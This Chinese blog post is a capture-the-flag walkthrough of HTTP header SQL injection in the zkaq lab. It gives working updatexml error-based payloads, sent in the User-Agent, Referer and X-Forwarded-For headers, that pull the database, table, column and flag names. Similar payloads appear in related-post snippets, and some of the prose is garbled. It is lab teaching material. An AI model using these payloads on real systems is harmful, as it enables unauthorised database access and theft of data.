SQL注入(head注入)---zkaq

已于 2022-04-21 23:40:20 修改
阅读量1.9k 收藏 1
点赞数
分类专栏: WEB安全---zkaq靶场 文章标签: web安全
于 2022-04-02 22:00:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_38237216/article/details/123929986
版权
本文详细解析了如何通过头部注入技术,利用$_SERVER['HTTP_REFERER']和不同的USER_AGENT来探测数据库信息,包括数据库名、表名和字段名,以及如何执行SQL注入获取敏感数据。案例涉及pass-07至pass-09的不同场景和应对策略。
摘要由CSDN通过智能技术生成

1.概念

头部插件:下面的情况信息与网站请求的插件就可以试用

常见的超变量:

  • $ _ REQUEST(获取GET/POST/COOKIE)COOKIE在新版本已经无法获取到- $ _ POST(获取POST传参)- $ _ GET(获取GET的参)- $ _COOKIE(COOKIE的值)- $ _SERVER(包含类别信息的路径(header)、以及脚本位置)等信息的路径)

$_SERVER 常见的用法:

  • $_SERVER[‘HTTP_REFERER’] 获取Refer请求用户头数据- $_SERVER[“HTTP_USER_AGENT”] 获取用户相关信息,包括用户浏览器、操作等信息。- $_SERVER[“REMOTE_ADDR”] 浏览网页的ip。

2.靶场

1.pass-07—他注入(一)

-查看源头,发现头已经对进入特殊的特征源进行了过滤

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来上传(img-IP8yTOUa-1650555601448)(https://img-blog.csdnimg.cn/img_convert/b20f1ac72e244171457b0007d421fc77.png)]

-源中头中头中的USER_AGENT与数据库有用的密码试探12个USER_AGENT入手试用-打先饱爆破,获取用户名及密码

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来上传(img-R2W23MHu-1650555601451)(https://img-blog.csdnimg.cn/img_convert/247b927f4093a19d6e9a744f93614a7e.png)]

-使用USER_AGENT注入获取数据库名: ’ or updatexml(1,concat(‘!’,database()),1),1) – wq - updatexml() :更新xml文档的函数

语法:updatexml(目标xml内容,xml文档路径,更新的内容)

得到数据库名head_error

  • 获取表名 :’ or updatexml(1,concat(‘!’,(select table_name from information_schema.tables where table_schema=‘head_error’ limit 0,1)),1),1) – qwe

得到表名:flag_head

  • 查询字段名 : ’ or updatexml(1,concat(‘!’,(select column_name from information_schema.columns where table_name=‘flag_head’ limit 0,1)),1),1) – qwe

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-mgt7s5ZS-1650555601452)( https://img-blog.csdnimg.cn/img_convert/b6bfdbedcb137d4cdcdf44a0ce9eb29c.png )]

得到两个名字:Id flag_h1

–查询表中数据:’ or updatexml(1,concat(‘!’,(select flag_h1 from flag_head limit 0,1)),1),1) — qwe

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来上传(img-iH5BUbLS-1650555601453)(https://img-blog.csdnimg.cn/img_convert/dd24d560f110a277eea2a83b83820b0e.png)]

迟到

2.pass-08—他注入(二)

-查看源代码

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来上传(img-SEShPzQm-1650555601454)(https://img-blog.csdnimg.cn/img_convert/ff15a0a4e568d5b39e30d50299e522c3.png)]

同上一题一样,修改heads的refer进行智能测试

3.pass-09 —头部注入(三)

-查看源代码

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来上传(img-870mBdUi-1650555601455)(https://img-blog.csdnimg.cn/img_convert/53e0052181564cd9c1cd43fb7e46cb36.png)]

同上题一样,修改header的X_FORWARDED_FOR进行智能测试

real_plot
关注
专栏目录
SQL注入(四):http头部注入
天威一号
11-05 414
目录
SQL请求头注入
weixin_30412013的博客
08-01 367
请求头注入   请求头注入就是将http请求的一些头部进行注入,因为这些头部和数据库产生了交互,那么它们就有可能存在注入。下面是一个http请求,让我们看一    可能存在注入的点:   ①Host(主机头)   在http1.0没有Host字段,在http1.1,增加这个字段,http协议的本质是建立tcp连接,而建立连接则需要知道对方的IP和端口号,然后才能发送...
从0到1,SQL注入(sql十大注入类型)收藏这一篇就够了,技术解析与实战演练
最新发布
黑战士的博客
06-26 1531
SQL 注入是比较常见的网络攻击方式之一,它不是利用操作系统的 BUG 来实现攻击,而是针对程序员编写时的疏忽,通过 SQL 语句,实现无账号登录,甚至篡改数据库。由于以下的环境都是 MySQL 数据库,所以先了解点 MySQL 有关的知识。在 MySQL5.0 之后,MySQL 默认添加了一个名为的数据库,该数据库的表都是只读的,不能进行更新、删除和插入等操作,也不能加载触发器,因为它们实际只是一个视图,不是基本表,没有关联的文件。mysql注释符:# 、/**/ 、 --
$_SERVER详解
lky_for_lucky的博客
12-16 1351
Brush $_SERVER详解 $_SERVER[‘HTTP_ACCEPT_LANGUAGE’]//浏览器语言 $_SERVER[‘REMOTE_ADDR’] //当前用户 IP 。 $_SERVER[‘REMOTE_HOST’] //当前用户主机名 $_SERVER[‘REQUEST_URI’] //URL $_SERVER[‘REMOTE_PORT’] //端口。 $_SERVER[‘SERVER_NAME’] //服务器主机的名称。 $_SERVER[‘PHP_SELF’]//正在执行脚本的文件名
SQL注入Header注入
秋水的博客
09-01 4016
Header简介 什么是Header头? 通常HTTP消息包括客户机向服务器的请求消息和服务器向客户机的响应消息。这两种类型的消息由一个起始行,一个或者多个头域,一个只是头域结束的空行和可选的消息体组成。HTTP的头域包括通用头,请求头,响应头和实体头四个部分。每个头域由一个域名,冒号(:)和域值三部分组成。域名是大小写无关的,域值前可以添加任何数量的空格符,头域可以被扩展为多行,在每行开始...
sql文件头注入
qq_44060093的博客
08-21 416
实验原理 1.常见的HTTP请求头有: (1)Host Host请求报头域主要用于指定被请求资源的Internet主机和端口号。 如:Host: localhost:8088 (2)User-Agent User-Agent请求报头域允许客户端将它的操作系统、浏览器和其他属性告诉服务器。登录一些网站时,很多时候都可以见到显示我们的浏览器、系统信息,这些都是此头的作用。 如:User-Agent: Mozilla/5.0 (3)Referer Referer包含一个URL,代表当前访问URL的上一个URL,也
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具
11-07
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具。需要 Java1.8 环境,执行如下命令启动 HrmsTool 工具, -e 是加密, -d 是解密。 $ java -jar HrmsTool.jar Usage: java -jar HrmsTool.jar -e xxx java ...
安全测试-常见sql注入方法,命令
03-31
安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入...
SQL注入演示:解决SQL注入 - 直接运行jar包
08-09
SQL注入演示:存在SQL注入 - 直接运行jar包
SQL注入----- head注入
weixin_45922278的博客
10-15 248
head注入 条件: 需要账号登入成功 有游客留言 有插入,储存,记录数据的功能select *from news where id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)解释:由于updatexml的第二个参数需要Xpath格式的字符串,以~开头的内容不是xml格式的语法, concat()函数为字符串连接函数显然...
18、SQL HEAD注入
songling515010475的专栏
05-22 371
Head注入的区别与GET/POST的区别在于,HEAD时面的参数如果不存数据库,注入进去是没有任何意义的,而GET/POST在业务增删改查过种上肯定会要操作数据库的,但现在软件一般都有日志记录,保存到数据库。 虽然我知道 这是Head注入,但忍不住试一下POST能不能提交,哈哈被过滤了* 进入正题: 获取数据库库名 User-Agent:’ or updatexml(1,concat(0x7e,(select database())),1),1)# User-Agent本身是用于后台识别客户端
SQL注入——HTTP头部注入
qq_52072846的博客
02-18 3023
实验目的 理解HTTP头部字段User-Agent、Referer、Cookie、X-Forwarded-For等的含义 和作用,掌握HTTP头部注入的原理、方法及基本流程。 实验原理 有时候,后台开发人员为了验证客户端HTTP Header(比如常用的Cookie验证 等)或者通过HTTP Header头信息获取客户端的一些信息(比如 User-Agent. Accept字段等),会对客户端HTTP Header进行获取并使用SQL语句进行处理,如果此时没有足够的安全考虑,就可能导致基于HTTP Hea
SQL-http头部注入
qq_64332865的博客
02-18 250
1.访问SQLi-Labs 网站在攻击机 Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs 上的sQLi-Labs网站Less-11。访问的URL为:http:// [靶机IP]/sqli-labs/Less-18/ 2.利用Burpsuite 工具抓包启动Burpsuite在攻击机 Pentest-Atk的桌面文件夹 Burp,鼠标左键双击BURP.cmd程序,启动 Burpsuite 。 设置Burpsuite的代理服务端口在Burpsuite 软件界面上选择选
SQL注入Head注入(三)
Mr.Huang_的博客
08-17 233
Head注入之ip注入 靶场环境:http://inject2.lab.aqlab.cn:81/Pass-09/index.php 在平时上网冲浪,我们经常去访问一起网站,比如我们经常访问的百度 但是面对越来越多的用户来访问,如果只有一台服务器,那么肯定会崩掉, 那么就有很多台服务器来处理这些请求,以此来满足用户的需求, 1.通过代理来找到离用户最近的服务器。 你提出请求 > 代理商(CDN)> 最近服务器处理你的请求并返回你想要的数据 服务器只会记录下代理商的ip,而不会记录下你的ip,这就
N11-sql注入(http头注入
尐猴子君ii的博客
04-01 788
打开pikachu 登录 打开burpsuite将包发到repeater。 将user改成’ 发现sql语句报错,说明是拼接到数据库的 这样,我们就可以创造闭合语句了 admin’ and updatexml(1,concat(ox7e,database()),0)# 可以看见,结果显示出来了,http头注入成功! ...
SQL注入之HTTP头部注入
QYbkx974的博客
11-07 313
1.堆叠查询2.宽字节注入3.Cookie 注入4.base64 注入5.User-Agent 注入6.referer 注入
SQL注入---HTTP报头注入
zhoutong2323的博客
04-08 520
前文提到万能密钥的工作原理,然而万能密钥仅在源代码没有代码审计,此时才被称之为万能密钥,而代码有代码审计时需要分以下几种情况讨论 先看代码: 了解完上述代码后发现,uagent没有相应的审计代码防止SQL注入,因此可以使用uagent进行注入
SQL注入实战:sqli-labs实验详解
"sqli-labs实验指导手册详细介绍了如何通过搭建sqli-labs实验平台来学习和实践SQL注入攻击及防御。本实验手册主要针对基于单引号的字符型联合注入进行深入解析,帮助读者理解SQL注入的原理,并提供逐步解密数据库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值